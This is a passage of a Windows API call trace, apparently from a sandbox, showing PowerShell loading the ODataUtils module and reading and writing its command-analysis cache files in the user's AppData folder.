"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\microsoft.powershell.odatautils.psd1")) returned 0xffffffff [0281.228] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0281.228] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.228] CoTaskMemFree (pv=0x25b73d007a0) [0281.242] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0281.242] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.242] CoTaskMemFree (pv=0x25b73cfd8e0) [0281.242] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8ab40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.243] GetCurrentProcess () returned 0xffffffffffffffff [0281.243] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8aff8 | out: TokenHandle=0x653ef8aff8*=0x908) returned 1 [0281.243] GetTokenInformation (in: TokenHandle=0x908, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8b0f8 | out: TokenInformation=0x0, ReturnLength=0x653ef8b0f8) returned 0 [0281.243] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984af0 [0281.243] GetTokenInformation (in: TokenHandle=0x908, TokenInformationClass=0x1, TokenInformation=0x25b73984af0, TokenInformationLength=0x2c, ReturnLength=0x653ef8b0f8 | out: TokenInformation=0x25b73984af0, ReturnLength=0x653ef8b0f8) returned 1 [0281.244] LocalFree (hMem=0x25b73984af0) returned 0x0 [0281.244] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c044910, cbSid=0x653ef8b0f0 | out: pSid=0x25b5c044910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8b0f0) returned 1 [0281.245] CreateMutexW (lpMutexAttributes=0x25b5c044a60, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x948 [0281.245] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8af90*=0x948, lpdwindex=0x653ef8ad64 | out: lpdwindex=0x653ef8ad64) returned 0x0 [0281.245] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0281.245] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.245] CoTaskMemFree (pv=0x25b73d007a0) [0281.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x653ef8ac50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0281.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c045108 | out: lpFileInformation=0x25b5c045108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1 [0281.246] ReleaseMutex (hMutex=0x948) returned 1 [0281.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x653ef8aab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0281.246] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x7f4 [0281.246] GetFileType (hFile=0x7f4) returned 0x1 [0281.246] GetFileType (hFile=0x7f4) returned 0x1 [0281.247] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x1000, lpOverlapped=0x0) returned 1 [0281.261] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x1000, lpOverlapped=0x0) returned 1 [0281.261] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x1000, lpOverlapped=0x0) returned 1 [0281.261] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x1000, lpOverlapped=0x0) returned 1 [0281.262] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x7a8, lpOverlapped=0x0) returned 1 [0281.262] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c045b30, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c045b30*, lpNumberOfBytesRead=0x653ef8b068*=0x0, lpOverlapped=0x0) returned 1 [0281.262] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c046448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c046448*, lpNumberOfBytesRead=0x653ef8b068*=0x0, lpOverlapped=0x0) returned 1 [0281.262] CloseHandle (hObject=0x7f4) returned 1 [0281.309] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1")) returned 0x20 [0281.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x653ef8a270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0281.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a750) returned 1 [0281.309] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x7f4 [0281.309] GetFileType (hFile=0x7f4) returned 0x1 [0281.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a6c0) returned 1 [0281.309] GetFileType (hFile=0x7f4) returned 0x1 [0281.309] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.312] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.313] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x1000, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0xb3c, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d352c, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d352c*, lpNumberOfBytesRead=0x653ef8a828*=0x0, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0d3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a828, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d3eb0*, lpNumberOfBytesRead=0x653ef8a828*=0x0, lpOverlapped=0x0) returned 1 [0281.316] CloseHandle (hObject=0x7f4) returned 1 [0281.498] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0281.498] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.499] CoTaskMemFree (pv=0x25b73cfd8e0) [0281.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8a280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.499] GetCurrentProcess () returned 0xffffffffffffffff [0281.499] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8a7c8 | out: TokenHandle=0x653ef8a7c8*=0x908) returned 1 [0281.499] GetTokenInformation (in: TokenHandle=0x908, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8a8c8 | out: TokenInformation=0x0, ReturnLength=0x653ef8a8c8) returned 0 [0281.499] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984930 [0281.499] GetTokenInformation (in: TokenHandle=0x908, TokenInformationClass=0x1, TokenInformation=0x25b73984930, TokenInformationLength=0x2c, ReturnLength=0x653ef8a8c8 | out: TokenInformation=0x25b73984930, ReturnLength=0x653ef8a8c8) returned 1 [0281.500] LocalFree (hMem=0x25b73984930) returned 0x0 [0281.500] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0c4808, cbSid=0x653ef8a8c0 | out: pSid=0x25b5c0c4808*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8a8c0) returned 1 [0281.501] CreateMutexW (lpMutexAttributes=0x25b5c0c4958, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x948 [0281.501] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8a760*=0x948, lpdwindex=0x653ef8a534 | out: lpdwindex=0x653ef8a534) returned 0x0 [0281.501] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0281.501] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.501] CoTaskMemFree (pv=0x25b73cfee20) [0281.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x653ef8a360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0281.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a7f0) returned 1 [0281.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c0cb750 | out: lpFileInformation=0x25b5c0cb750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1 [0281.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a7b0) returned 1 [0281.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8a220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a670) returned 1 [0281.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8a750 | out: lpFileInformation=0x653ef8a750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0281.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a630) returned 1 [0281.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8a0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0281.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a5b0) returned 1 [0281.503] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7f4 [0281.503] GetFileType (hFile=0x7f4) returned 0x1 [0281.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a520) returned 1 [0281.503] GetFileType (hFile=0x7f4) returned 0x1 [0281.503] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a418, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef8a418*=0x1000, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ceba2, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8a0b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ceba2*, lpNumberOfBytesRead=0x653ef8a0b8*=0x1f, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a088, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef8a088*=0x1000, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ceba4, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef89f38, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ceba4*, lpNumberOfBytesRead=0x653ef89f38*=0x27, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef89fd8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef89fd8*=0x1000, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ceb70, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef89e98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ceb70*, lpNumberOfBytesRead=0x653ef89e98*=0x5, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef89f38, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef89f38*=0x1000, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ceb42, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8a048, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ceb42*, lpNumberOfBytesRead=0x653ef8a048*=0x1d, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a0e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef8a0e8*=0xc85, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ccdc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8a3e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ccdc0*, lpNumberOfBytesRead=0x653ef8a3e8*=0x0, lpOverlapped=0x0) returned 1 [0281.511] CloseHandle (hObject=0x7f4) returned 1 [0281.511] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff040 [0281.511] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff040 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.511] CoTaskMemFree (pv=0x25b73cff040) [0281.511] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8a110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.511] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8a2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a6f0) returned 1 [0281.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8a7d0 | out: lpFileInformation=0x653ef8a7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0281.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a6b0) returned 1 [0281.512] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", nBufferLength=0x105, lpBuffer=0x653ef8a150, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", lpFilePart=0x0) returned 0x93 [0281.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a630) returned 1 [0281.512] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6de40067-cd2a-4666-8cd9-870e0a588215"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7f4 [0281.513] GetFileType (hFile=0x7f4) returned 0x1 [0281.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a5a0) returned 1 [0281.513] GetFileType (hFile=0x7f4) returned 0x1 [0281.513] SetEndOfFile (hFile=0x7f4) returned 1 [0281.514] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0db1f0*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0x653ef8a738, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0db1f0*, lpNumberOfBytesWritten=0x653ef8a738*=0x662, lpOverlapped=0x0) returned 1 [0281.515] CloseHandle (hObject=0x7f4) returned 1 [0281.517] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0281.517] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.517] CoTaskMemFree (pv=0x25b73d007a0) [0281.517] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8a0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 